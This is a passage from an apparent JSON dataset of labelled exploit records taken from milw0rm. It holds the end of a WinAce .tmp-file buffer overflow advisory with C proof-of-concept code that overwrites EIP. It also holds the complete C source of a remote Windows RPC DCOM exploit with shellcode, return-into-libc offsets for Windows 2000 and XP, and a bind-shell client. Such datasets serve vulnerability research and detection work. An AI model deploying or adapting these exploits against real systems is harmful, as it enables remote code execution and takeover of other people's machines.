entries.\n\n\n\nAn example malicious .tmp file with a long file name:\n\n\n\n\tc:\\AAAAAAAAA...[A x 2021 bytes is where the EIP starts]1234[AAAA...AAAAA]\\r\\n\n\n\n\nCommand line:\n\n\n\n\t\"C:\\Program Files\\WinAce\\winace.exe\" a \"C:\\Program Files\\WinAce\\winace\" @c:\\crafted.tmp\n\n\n\n'[A x 2021]' represents any string of 2021 bytes in\n\nlength. Opening either malicious tmp file on the Microsoft Windows\n\nplatform will cause WinAce to crash with an access violation when\n\nattempting to execute instruction 0x34333231, which is the little-endian\n\nASCII code representation of '1234'. An attacker can exploit this\n\nvulnerability to redirect the flow of control and eventually execute\n\narbitrary code. This example is specific to the Microsoft Windows\n\nplatform.\n\n\n\nIII. ANALYSIS\n\n\n\nExploitation of the described vulnerability allows remote attackers to\n\nexecute arbitrary code under the context of the user who started WinAce.\n\n\n\nExploitation requires that an attacker to execute arbitrary command line which contain location of malicious tmp file.\n\n\n\nIV. DETECTION\n\n\n\nWinAce 2.6.0.5 as installed on the Microsoft Windows\n\nplatform is affected. Earlier versions may also be susceptible.\n\n\n\nV. DISCLOSURE TIMELINE\n\n\n\n07/22/2005  Initial vendor notification\n\n07/25/2005  Initial vendor response\n\n08/19/2005  Public disclosure\n\n\n\nVI. POC:\n\n*/\n\n\n\n/*\n\n*\n\n* WinAce Temporary File Parsing Buffer Overflow Vulnerability\n\n* http://www.winace.com/winace.html\n\n* Discovered & Coded By ATmaCA\n\n* Web: atmacasoft.com && spyinstructors.com\n\n* E-Mail: atmaca@icqmail.com\n\n* Credit to kozan\n\n*\n\n*/\n\n\n\n/*\n\n*\n\n* Tested with WinAce 2.6.0.5 as installed on the Win XP Sp2 En platform\n\n*\n\n*/\n\n\n\n#include <windows.h>\n\n#include <stdio.h>\n\n\n\nvoid main()\n\n{\n\n        // create crafted command line\n\n        char tmpfile[] = \"c:\\\\crafted.tmp\";\n\n        char winacepath[] = \"\\\"C:\\\\Program Files\\\\WinAce\\\\winace.exe\\\"\";\n\n        char compresspar[] = \" a \\\"C:\\\\Program Files\\\\WinAce\\\\winace\\\" @\";\n\n        char runpar[300];\n\n        int i = 0;\n\n        char Ret_Addr[]= \"\\x31\\x32\\x33\\x34\";\n\n\n\n        strcpy(runpar,winacepath);\n\n        strcat(runpar,compresspar);\n\n        strcat(runpar,tmpfile);\n\n\n\n        // create crafted .tmp file\n\n        FILE *di;\n\n        if( (di=fopen(tmpfile,\"wb\")) == NULL ){\n\n                return;\n\n        }\n\n\n\n        fprintf(di,\"c:\\\\\");\n\n\n\n        for(i=0;i<2013;i++)\n\n                fputc(0x41,di);\n\n\n\n        // Overwriting the return address (EIP)\n\n        fprintf(di,Ret_Addr); //EIP\n\n\n\n        for(i=0;i<178;i++)\n\n                fputc(0x41,di);\n\n\n\n        // end of file\n\n        fprintf(di,\"\\x2E\\x74\\x78\\x74\\x0D\\x0A\");\n\n\n\n        fclose(di);\n\n        WinExec(runpar,SW_SHOW);\n\n}\n\n\n\n// milw0rm.com [2005-08-19]",
885        "vulnerable": true
886    },
887    {
888        "exploit_id": 117,
889        "content": "/*\n\n * have you recently bought one of those expensive new windows security products\n\n * on the market? do you think you now have strong protection?\n\n * Look again:\n\n *\n\n * *rpc!exec* \n\n * by ins1der (trixterjack yahoo com)\n\n *\n\n * windows remote return into libc exploit!\n\n *\n\n * remote rpc exploit breaking non exec memory protection schemes\n\n * tested against : \n\n *\t\tOverflowGuard \n\n *\t\tStackDefender (kernel32 imagebase randomization:O nice try guys.)\n\n *\t\t \t\n\n *\n\n * currently breaking:\n\n * Windows 2000 SP0 (english)\n\n * Windows XP SP0 (english)\n\n *\n\n * to get new offsets use this:\n\n * ------------------------------\n\n * \t#include <windows.h>\n\n *\t#include <stdio.h>\n\n *\t\n\n *\tint main()\n\n *\t{\n\n *\tHANDLE h1,h2;\n\n *\tunsigned long addr1,addr2,addr3,addr4;\n\n *\th1=LoadLibrary(\"ntdll.dll\");\n\n *\th2=LoadLibrary(\"MSVCRT.dll\");\n\n *\taddr1=(unsigned long)GetProcAddress(h1,\"NtAllocateVirtualMemory\");\n\n *\taddr2=(unsigned long)GetProcAddress(h2,\"memcpy\");\n\n *\taddr3=(unsigned long)GetProcAddress(h1,\"NtProtectVirtualMemory\");\n\n *\t\tfor (addr4=addr1;addr4<addr1+0xffff;addr4++)\n\n *\t\t\t{\n\n *\t\t\tif (!memcmp((void*)addr4,\"\\xc9\\xc3\",2)) break;\n\n *\t\t\t}\n\n *\tprintf(\"0x%x 0x%x 0x%x 0x%x\\n\",addr1,addr2,addr3,addr4);\n\n *\treturn 0;\n\n *\t}\n\n * -----------------------------\n\n * to get the last offset use a standard rpc dcom exploit with the last\n\n * \\x90\\x90 before the shellcode replaced with \\xcd\\x21. run the exploit\n\n * and read the drwatson logs. substract 0xA5 from the fault address.\n\n *\n\n *\n\n * \tShouts go to: \n\n *\t\tw00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),\n\n *\t\ts0ny, crisis, and to all my true friends.\n\n *\t\n\n *\t\n\n * \tEnjoy!\n\n * \n\n */\n\n\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n\n\nunsigned char bindstr[]={\n\n0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,\n\n0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,\n\n0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,\n\n0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,\n\n0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};\n\n\n\nunsigned char request1[]={\n\n0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,\n\n0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,\n\n0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,\n\n0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,\n\n0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,\n\n0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,\n\n0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,\n\n0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,\n\n0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,\n\n0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\n\n0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,\n\n0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,\n\n0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,\n\n0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,\n\n0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,\n\n0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,\n\n0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,\n\n0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,\n\n0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,\n\n0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,\n\n0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,\n\n0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,\n\n0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,\n\n0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,\n\n0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,\n\n0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,\n\n0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,\n\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n\n0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,\n\n0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};\n\n\n\nunsigned char request2[]={\n\n0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00\n\n};\n\n\n\nunsigned char request3[]={\n\n0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,\n\n0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,\n\n0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,\n\n0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};\n\n\n\nunsigned char request4[]={\n\n0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,\n\n0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,\n\n0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00\n\n};\n\n\n\n\n\nstruct offset\n\n{\n\nchar *description;\n\nunsigned long valloc;\n\nunsigned long amemcpy;\n\nunsigned long vprot;\n\nunsigned long ret;\n\nunsigned long frame;\n\n};\n\nstruct offset targets[]=\n\n{\n\n\t{\"Windows 2000 SP0 (english)\",\n\n\t\t0x77f95da9,\n\n\t    \t0x78001194,\n\n\t\t0x77f82ffb,\n\n\t\t0x77f96800,\n\n\t\t0x52f770\n\n\t}\n\n\t,\n\n\t{\"Windows XP   SP0 (english)\",\n\n\t        0x77f7e4c3,\n\n\t        0x77c42e10,\n\n\t        0x77f7ec43,\n\n\t        0x77f80a07,\n\n\t        0x5bf79c\n\n\t}\n\n\t,\n\n\t{NULL,0,0,0,0,0}\n\n};\n\n\n\n\n\nunsigned char shell[]=\n\n     \t\n\n\t\"\\x46\\x00\\x58\\x00\"\n\n\t\"\\x4E\\x00\\x42\\x00\"\n\n\t\"\\x46\\x00\\x58\\x00\"\n\n\t\"\\x46\\x00\\x58\\x00\"\n\n\t\n\n\t\"\\x4E\\x00\\x42\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00\"\n\n\n\n\t\"\\xff\\xff\\xff\\xff\"\n\n  \t\"\\xff\\xff\\xff\\xff\" \n\n\n\n    \t\"\\xcc\\xe0\\xfd\\x7f\"\n\n    \t\"\\xcc\\xe0\\xfd\\x7f\"\n\n\n\n    \t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n    \t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n    \t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n    \t\"\\x90\\x90\\x90\\x90\"\n\n\t\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n    \t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n\t\"\\x90\\x90\\x90\\x90\"\n\n    \n\n\t\n\n    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n    \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n    \n\n    \"\\x83\\xec\\x34\\x8b\\xf4\\xe8\\x47\\x01\\x00\\x00\\x89\\x06\\xff\\x36\\x68\\x8e\"\n\n    \"\\x4e\\x0e\\xec\\xe8\\x61\\x01\\x00\\x00\\x89\\x46\\x08\\xff\\x36\\x68\\xad\\xd9\"\n\n    \"\\x05\\xce\\xe8\\x52\\x01\\x00\\x00\\x89\\x46\\x0c\\x68\\x6c\\x6c\\x00\\x00\\x68\"\n\n    \"\\x33\\x32\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\x56\\x08\\x89\\x46\\x04\"\n\n    \"\\xff\\x36\\x68\\x72\\xfe\\xb3\\x16\\xe8\\x2d\\x01\\x00\\x00\\x89\\x46\\x10\\xff\"\n\n    \"\\x36\\x68\\xef\\xce\\xe0\\x60\\xe8\\x1e\\x01\\x00\\x00\\x89\\x46\\x14\\xff\\x76\"\n\n    \"\\x04\\x68\\xcb\\xed\\xfc\\x3b\\xe8\\x0e\\x01\\x00\\x00\\x89\\x46\\x18\\xff\\x76\"\n\n    \"\\x04\\x68\\xd9\\x09\\xf5\\xad\\xe8\\xfe\\x00\\x00\\x00\\x89\\x46\\x1c\\xff\\x76\"\n\n    \"\\x04\\x68\\xa4\\x1a\\x70\\xc7\\xe8\\xee\\x00\\x00\\x00\\x89\\x46\\x20\\xff\\x76\"\n\n    \"\\x04\\x68\\xa4\\xad\\x2e\\xe9\\xe8\\xde\\x00\\x00\\x00\\x89\\x46\\x24\\xff\\x76\"\n\n    \"\\x04\\x68\\xe5\\x49\\x86\\x49\\xe8\\xce\\x00\\x00\\x00\\x89\\x46\\x28\\xff\\x76\"\n\n    \"\\x04\\x68\\xe7\\x79\\xc6\\x79\\xe8\\xbe\\x00\\x00\\x00\\x89\\x46\\x2c\\x33\\xff\"\n\n    \"\\x81\\xec\\x90\\x01\\x00\\x00\\x54\\x68\\x01\\x01\\x00\\x00\\xff\\x56\\x18\\x50\"\n\n    \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xff\\x56\\x1c\\x8b\\xd8\\x57\\x57\\x68\\x02\"\n\n    \"\\x00\\x1c\\x07\\x8b\\xcc\\x6a\\x16\\x51\\x53\\xff\\x56\\x20\\x57\\x53\\xff\\x56\"\n\n    \"\\x24\\x57\\x51\\x53\\xff\\x56\\x28\\x8b\\xd0\\x68\\x65\\x78\\x65\\x00\\x68\\x63\"\n\n    \"\\x6d\\x64\\x2e\\x89\\x66\\x30\\x83\\xec\\x54\\x8d\\x3c\\x24\\x33\\xc0\\x33\\xc9\"\n\n    \"\\x83\\xc1\\x15\\xab\\xe2\\xfd\\xc6\\x44\\x24\\x10\\x44\\xfe\\x44\\x24\\x3d\\x89\"\n\n    \"\\x54\\x24\\x48\\x89\\x54\\x24\\x4c\\x89\\x54\\x24\\x50\\x8d\\x44\\x24\\x10\\x54\"\n\n    \"\\x50\\x51\\x51\\x51\\x6a\\x01\\x51\\x51\\xff\\x76\\x30\\x51\\xff\\x56\\x10\\x8b\"\n\n    \"\\xcc\\x6a\\xff\\xff\\x31\\xff\\x56\\x0c\\x8b\\xc8\\x57\\xff\\x56\\x2c\\xff\\x56\"\n\n    \"\\x14\\x55\\x56\\x64\\xa1\\x30\\x00\\x00\\x00\\x85\\xc0\\x78\\x0c\\x8b\\x40\\x0c\"\n\n    \"\\x8b\\x70\\x1c\\xad\\x8b\\x68\\x08\\xeb\\x09\\x8b\\x40\\x34\\x8b\\xa8\\xb8\\x00\"\n\n    \"\\x00\\x00\\x8b\\xc5\\x5e\\x5d\\xc2\\x04\\x00\\x53\\x55\\x56\\x57\\x8b\\x6c\\x24\"\n\n    \"\\x18\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x03\\xd5\\x8b\\x4a\\x18\\x8b\\x5a\\x20\"\n\n    \"\\x03\\xdd\\xe3\\x32\\x49\\x8b\\x34\\x8b\\x03\\xf5\\x33\\xff\\xfc\\x33\\xc0\\xac\"\n\n    \"\\x3a\\xc4\\x74\\x07\\xc1\\xcf\\x0d\\x03\\xf8\\xeb\\xf2\\x3b\\x7c\\x24\\x14\\x75\"\n\n    \"\\xe1\\x8b\\x5a\\x24\\x03\\xdd\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x03\\xdd\\x8b\"\n\n    \"\\x04\\x8b\\x03\\xc5\\xeb\\x02\\x33\\xc0\\x8b\\xd5\\x5f\\x5e\\x5d\\x5b\\xc2\\x04\"\n\n    \"\\x00\\x90\\x90\\x90\\x80\\xbf\\x32\\x94\\x80\\xbf\\x32\\x94\";\n\n \n\n\n\nstruct frame1\n\n{\n\nunsigned long frame0;\n\nunsigned long ret;\n\n}fr1;\n\n\n\nstruct retstruct\n\n{\n\nunsigned long frame1;\n\nunsigned long valloc;\n\nunsigned long ret1;\n\nunsigned long dummy1;\n\nunsigned long pointer11;\n\nunsigned long zero;\n\nunsigned long pointer12;\n\nunsigned long type;\n\nunsigned long prot;\n\n\n\nunsigned long frame2;\n\nunsigned long amemcpy;\n\nunsigned long ret2;\n\nunsigned long dest;\n\nunsigned long src;\n\nunsigned long size2;\n\n\n\nunsigned long frame3;\n\nunsigned long vprot;\n\nunsigned long ret3;\n\nunsigned long dummy2;\n\nunsigned long pointer21;\n\nunsigned long pointer22;\n\nunsigned long newprot;\n\nunsigned long oldprot;\n\n}rets;\n\n\n\nvoid prepare_ret(int id)\n\n{\n\n  rets.type=0x3000;\n\n  rets.prot=0x4;\n\n  rets.newprot=0x20;\n\n\n\n  rets.valloc=targets[id].valloc;\n\n  rets.amemcpy=targets[id].amemcpy;\n\n  rets.vprot=targets[id].vprot;\n\n  fr1.ret=rets.ret1=rets.ret2=targets[id].ret;\n\n  fr1.frame0=targets[id].frame;\n\n\n\n  rets.frame1=fr1.frame0+9*4;\n\n  rets.frame2=rets.frame1+6*4;\n\n  rets.oldprot=fr1.frame0;\n\n  rets.frame3=rets.frame1;\n\n  rets.size2=sizeof(shell);\n\n\n\n  rets.src=fr1.frame0;\n\n  rets.dest=0x55555000;\n\n  rets.ret3=0x5555506c;\n\n\n\n  rets.dummy1=rets.dummy2=0xffffffff;\n\n  rets.zero=0;\n\n\n\n  *(int*)(shell+148)=0x55555000;\n\n  *(int*)(shell+152)=sizeof(shell);\n\n\n\n  *(int*)(shell+140)=0x55555000;\n\n  *(int*)(shell+144)=sizeof(shell);\n\n\n\n  rets.pointer11=fr1.frame0+92;\n\n  rets.pointer12=fr1.frame0+96;\n\n  rets.pointer21=fr1.frame0+100;\n\n  rets.pointer22=fr1.frame0+104;\n\n\n\n  memcpy(shell+32,&fr1,sizeof(fr1));\n\n  memcpy(shell+48,&rets,sizeof(rets));\n\n}\n\n\n\nvoid entershell(int sock)\n\n{\n\n  char buf[3000];\n\n  fd_set  fdr;\n\n  int rs;\n\n\n\n  FD_ZERO(&fdr);\n\n  FD_SET(sock,&fdr);\n\n  FD_SET(0,&fdr);\n\n\n\n  for(;;) \n\n  {\n\n    FD_SET(sock, &fdr);\n\n    FD_SET(0, &fdr);\n\n    if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;\n\n    if(FD_ISSET(sock, &fdr)) \n\n      {\n\n        if((rs=read(sock,buf,sizeof(buf)))<0)\n\n        {\n\n           printf(\"connection lost\\n\");\n\n           return;\n\n        }\n\n        if(write(1,buf,rs)<0) break;\n\n      }\n\n\n\n    if(FD_ISSET(0,&fdr)) \n\n      {\n\n        if((rs=read(0,buf,sizeof(buf)))<0)\n\n        {\n\n           printf(\"[-] Connection lost..\\n\");\n\n           exit(1);\n\n        }\n\n        if (write(sock,buf,rs) < 0) break;\n\n      }\n\n        usleep(100);\n\n   }\n\n        \n\n   printf(\"connection closed\\n\");\n\n \n\n   return;\n\n}\n\n\n\n\n\nint main(int argc, char **argv)\n\n{\n\n    \n\n    int sock,i,len1;\n\n    struct sockaddr_in sin;\n\n    unsigned char buf1[0x1000],buf2[0x1000];\n\n\n\n    if(argc<3)\n\n    {   \n\n\tprintf(\"###############################\\n\");\n\n\tprintf(\"return into libc rpc exploit\\n\");\n\n\tprintf(\"ins1der 2003\\n\");\n\n\tprintf(\"*****************************************\\n\");\n\n        printf(\"usage: %s <ip> <id>\\n\", argv[0]);\n\n\tprintf(\"*****************************************\\n\");\n\n        printf(\"targets:\\n\");\n\n\tprintf(\"-----------------------------------------\\n\");\n\n        for (i=0;targets[i].description!= NULL;i++)\n\n            {\n\n            printf(\"%d\\t%s\\n\",i,targets[i].description);   \n\n            }\n\n\tprintf(\"-----------------------------------------\\n\");\n\n        \n\n        return 0;\n\n    }\n\n\t\n\n\t\t\n\n \t\n\n\n\n    printf(\"Exploiting %s...\\n\",argv[1]);\n\n  \t\n\n    prepare_ret(atoi(argv[2]));\n\n    \n\n    sin.sin_family=AF_INET;\n\n    sin.sin_addr.s_addr=inet_addr(argv[1]);\n\n    sin.sin_port=htons(135);\n\n\n\n    if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)\n\n    {\n\n        perror(\"socket \");\n\n        return 0;\n\n    }\n\n    \n\n    if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))\n\n    {\n\n        perror(\"connect \");\n\n        return 0;\n\n    }\n\n    \n\n    memcpy(buf2,request1,sizeof(request1));\n\n    len1=sizeof(request1);\n\n    \n\n    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(shell)/2;  \n\n    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(shell)/2;\n\n    \n\n    memcpy(buf2+len1,request2,sizeof(request2));\n\n    len1=len1+sizeof(request2);\n\n    memcpy(buf2+len1,shell,sizeof(shell));\n\n    len1=len1+sizeof(shell);\n\n    memcpy(buf2+len1,request3,sizeof(request3));\n\n    len1=len1+sizeof(request3);\n\n    memcpy(buf2+len1,request4,sizeof(request4));\n\n    len1=len1+sizeof(request4);\n\n    \n\n    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(shell)-0xc;\n\n    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(shell)-0xc;\n\n \n\n    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(shell)-0xc;\n\n    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(shell)-0xc;\n\n    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(shell)-0xc;\n\n    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(shell)-0xc;\n\n    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(shell)-0xc;\n\n    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(shell)-0xc;\n\n    \n\n    if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)\n\n    {\n\n            perror(\"send\");\n\n            return 0;\n\n    }\n\n\n\n    recv(sock,(char*)buf1,1000,0);\n\n    \n\n    if (send(sock,(char*)buf2,len1,0)== -1)\n\n    {\n\n            perror(\"send\");\n\n            return 0;\n\n    }\n\n    close(sock);\n\n\n\n    sleep(1);\n\n    \n\n    sin.sin_port = htons(7175);\n\n\n\n    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)\n\n    {\n\n        perror(\"socket\");\n\n        return(0);\n\n    }\n\n    \n\n    if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1)\n\n    {\n\n        printf(\"Exploit failed\\n\");\n\n        return(0);\n\n    }   \n\n    \n\n    printf(\"Entering shell\\n\");\n\n    entershell(sock);\n\n    return 1;\n\n\n\n}\n\n\n\n\n\n// milw0rm.com [2003-11-07]",
